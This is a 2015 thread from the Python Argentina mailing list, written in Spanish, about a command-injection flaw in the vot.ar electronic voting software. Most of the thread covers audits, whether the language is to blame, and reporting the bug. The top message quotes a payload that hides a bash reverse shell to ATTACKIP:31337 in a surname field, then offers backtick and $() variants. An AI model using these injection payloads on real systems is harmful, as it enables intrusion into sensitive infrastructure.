[pyar] Solo pasaba por aqui

Federico Ferraro fferraro18 en gmail.com
Vie Jun 19 22:10:57 ART 2015


Este ejemplo esta mal ?

#Ejemplo de nombre de autoridad de mesa que ejecuta un reverse shell:

   Nombre: Juan Domingo
   Apellido: Peron;/bin/bash -i >& /dev/tcp/ATTACKIP/31337 0>&1'

Tendría
Apellido: Peron;`/bin/bash -i >& /dev/tcp/ATTACKIP/31337 0>&1`

o

Apellido: Peron;$(/bin/bash -i >& /dev/tcp/ATTACKIP/31337 0>&1)

Porque esta entre comillas el parametro del comando "%s" ..

Slds ..

El 19 de junio de 2015, 19:33, fisa <fisadev en gmail.com> escribió:

> Igual que con los proyectos libres: si hay issue tracker público o sitio
> para eso, ahí, si no, mail al desarrollador :)
> (reportar issues no es algo que dependa de que un proyecto sea libre o
> comunitario, es algo que se hace en todos los ambientes. Pensá en la
> mayoría de los juegos, por ejemplo)
>
> On Fri, Jun 19, 2015 at 7:23 PM Juan Esteban Carrique <carrique en gmail.com>
> wrote:
>
>> che fisa donde se le reportan los bugs si no es un proyecto comunitario?
>> no estaria demas un refactoring luego de participar de un evento de
>> seguridad como este :P
>>
>> http://blog.segu-info.com.ar/2015/06/charla-online-gratuita-sobre-desarrollo.html?m=1
>>
>> Ing. Juan Carrique
>> Santa Fe, Argentina
>> Electrónica, Arduino,
>> Coaching, Diabetes,
>> http://facebook.com/ReDuino
>>
>> 2015-06-19 17:58 GMT-03:00 Federico Ferraro <fferraro18 en gmail.com>:
>>
>>> Perdón, alguien probo ese bug ?? Funciona ?? Porque ??
>>>
>>> Slds ...
>>>
>>>
>>> El 19 de junio de 2015, 17:11, fisa <fisadev en gmail.com> escribió:
>>>
>>>> Andres: me des-digo: tenés razón, es una vulnerabilidad porque la data
>>>> de autoridad de mesa la ingresa el usuario. Estaría bueno reportarlo a la
>>>> gente de MSA.
>>>>
>>>> On Fri, Jun 19, 2015 at 4:46 PM fisa <fisadev en gmail.com> wrote:
>>>>
>>>>> Mustang: se dice "sensible" :)
>>>>> Hay gente haciendo cosas super sensibles en python en lugares muy
>>>>> importantes (NASA, Google, Canonical, Mozilla, ...). Me parece que tenés un
>>>>> mal concepto o de python, o de las cosas que se requieren de un lenguaje a
>>>>> la hora de hacer cosas "sensibles".
>>>>>
>>>>> On Fri, Jun 19, 2015 at 4:40 PM Betiel <betielix en gmail.com> wrote:
>>>>>
>>>>>> Bueno, según su twitter tardó 2 horas.. pero.. igual... triste las
>>>>>> auditorías oficiales :(
>>>>>>
>>>>>>
>>>>>> Todavía quiero saber si alguien auditó el hard!!! <-- Si el soft
>>>>>> tiene estos agujeros, no quiero ni pensar lo que se puede encontrar en el
>>>>>> hard!!
>>>>>>
>>>>>> Betiel
>>>>>>
>>>>>> El 19 de junio de 2015, 16:35, Andres Riancho <
>>>>>> andres.riancho en gmail.com> escribió:
>>>>>>
>>>>>>> Estoy de acuerdo, nada tiene que ver el OS / Python
>>>>>>>
>>>>>>> Horriblemente auditado. Segun diversas fuentes se gasto 1.558.750
>>>>>>> pesos argentinos en auditorias. Alfredo Ortega encontro esa
>>>>>>> vulnerabilidad en 5 minutos.
>>>>>>>
>>>>>>> On Fri, Jun 19, 2015 at 4:30 PM, Luis I. Facciolo <
>>>>>>> lifacciolo en gmail.com> wrote:
>>>>>>> > *Sensible.
>>>>>>> >
>>>>>>> > El problema no es ni el lenguaje ni el SO. Es el/los
>>>>>>> programadores. Y/o que
>>>>>>> > no este auditado/probado correctamente.
>>>>>>> >
>>>>>>> > 2015-06-19 16:28 GMT-03:00 Mustang Ford <
>>>>>>> fordmustangcobra1969 en gmail.com>:
>>>>>>> >>
>>>>>>> >> No me entra en la cabeza como un sistema tan "sencible" haya sido
>>>>>>> >> programado en Python sobre Ubuntu.
>>>>>>> >> Somos argentinos!
>>>>>>> >>
>>>>>>> >> 2015-06-19 15:23 GMT-03:00 Lucio Torre <lucio.torre en gmail.com>:
>>>>>>> >>>
>>>>>>> >>> https://github.com/prometheus-ar/vot.ar
>>>>>>> >>>
>>>>>>> >>> https://www.youtube.com/watch?v=ug6cnFgZlso
>>>>>>> >>>
>>>>>>> >>> _______________________________________________
>>>>>>> >>> pyar mailing list pyar en python.org.ar
>>>>>>> >>> http://listas.python.org.ar/listinfo/pyar
>>>>>>> >>>
>>>>>>> >>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>>>> >>>
>>>>>>> >>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software
>>>>>>> Libre de
>>>>>>> >>> Argentina - http://www.usla.org.ar
>>>>>>> >>
>>>>>>> >>
>>>>>>> >>
>>>>>>> >> _______________________________________________
>>>>>>> >> pyar mailing list pyar en python.org.ar
>>>>>>> >> http://listas.python.org.ar/listinfo/pyar
>>>>>>> >>
>>>>>>> >> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>>>> >>
>>>>>>> >> La lista de PyAr esta Hosteada en USLA - Usuarios de Software
>>>>>>> Libre de
>>>>>>> >> Argentina - http://www.usla.org.ar
>>>>>>> >
>>>>>>> >
>>>>>>> >
>>>>>>> > _______________________________________________
>>>>>>> > pyar mailing list pyar en python.org.ar
>>>>>>> > http://listas.python.org.ar/listinfo/pyar
>>>>>>> >
>>>>>>> > PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>>>> >
>>>>>>> > La lista de PyAr esta Hosteada en USLA - Usuarios de Software
>>>>>>> Libre de
>>>>>>> > Argentina - http://www.usla.org.ar
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> Andrés Riancho
>>>>>>> Project Leader at w3af - http://w3af.org/
>>>>>>> Web Application Attack and Audit Framework
>>>>>>> Twitter: @w3af
>>>>>>> GPG: 0x93C344F3
>>>>>>> _______________________________________________
>>>>>>> pyar mailing list pyar en python.org.ar
>>>>>>> http://listas.python.org.ar/listinfo/pyar
>>>>>>>
>>>>>>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>>>>
>>>>>>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre
>>>>>>> de Argentina - http://www.usla.org.ar
>>>>>>>
>>>>>>
>>>>>> _______________________________________________
>>>>>> pyar mailing list pyar en python.org.ar
>>>>>> http://listas.python.org.ar/listinfo/pyar
>>>>>>
>>>>>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>>>
>>>>>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre
>>>>>> de Argentina - http://www.usla.org.ar
>>>>>
>>>>>
>>>> _______________________________________________
>>>> pyar mailing list pyar en python.org.ar
>>>> http://listas.python.org.ar/listinfo/pyar
>>>>
>>>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>>
>>>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre de
>>>> Argentina - http://www.usla.org.ar
>>>>
>>>
>>>
>>>
>>> --
>>> --
>>> Federico Ferraro
>>> Usuario Linux : 482533.
>>> --
>>>
>>> _______________________________________________
>>> pyar mailing list pyar en python.org.ar
>>> http://listas.python.org.ar/listinfo/pyar
>>>
>>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>>
>>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre de
>>> Argentina - http://www.usla.org.ar
>>>
>>
>> _______________________________________________
>> pyar mailing list pyar en python.org.ar
>> http://listas.python.org.ar/listinfo/pyar
>>
>> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>>
>> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre de
>> Argentina - http://www.usla.org.ar
>
>
> _______________________________________________
> pyar mailing list pyar en python.org.ar
> http://listas.python.org.ar/listinfo/pyar
>
> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>
> La lista de PyAr esta Hosteada en USLA - Usuarios de Software Libre de
> Argentina - http://www.usla.org.ar
>



-- 
--
Federico Ferraro
Usuario Linux : 482533.
--
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://listas.python.org.ar/pipermail/pyar/attachments/20150619/893d790e/attachment-0001.html>


More information about the pyar mailing list